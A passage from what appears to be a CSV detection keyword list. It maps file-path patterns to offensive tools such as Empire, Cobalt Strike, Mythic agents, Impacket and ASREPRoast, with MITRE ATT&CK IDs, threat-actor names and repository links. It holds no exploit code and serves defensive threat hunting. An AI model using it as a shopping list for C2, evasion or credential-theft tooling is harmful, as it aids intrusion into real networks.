T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/v1/campaign/*/implants/*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/api/v1/implants/*/execute*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/api/v1/implants/*/responses*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/api/v2/starkiller*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api0cradle/CVE-*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" +"*/Apollo.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/Apollo.git*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/Apollo/Agent/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/ApolloInterop.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/ApolloInterop/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/apollon-all-x64*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*/apollon-main.zip*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*/apollon-selective-x64*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*/ApolloTest.exe","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/AppFiles/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/aquasecurity/cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*/Ares.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*/ares.py *","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*/armitage.git*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*/arp_scanner.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/arp_spoof/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/artifactor.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/ase_docker/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/asn-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/asprox.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/asprox.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/ASRenum.cpp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" +"*/ASRenum.cs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" +"*/ASRenum-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" +"*/ASREPRoast*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" +"*/asreproast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ASREProastables.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/assets/bin2uuids_file.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/asyncssh_server.py*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*/atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.exe*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.Profiles.*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena.sln*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena/Assembly/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Athena/Commands/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/athena/mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - 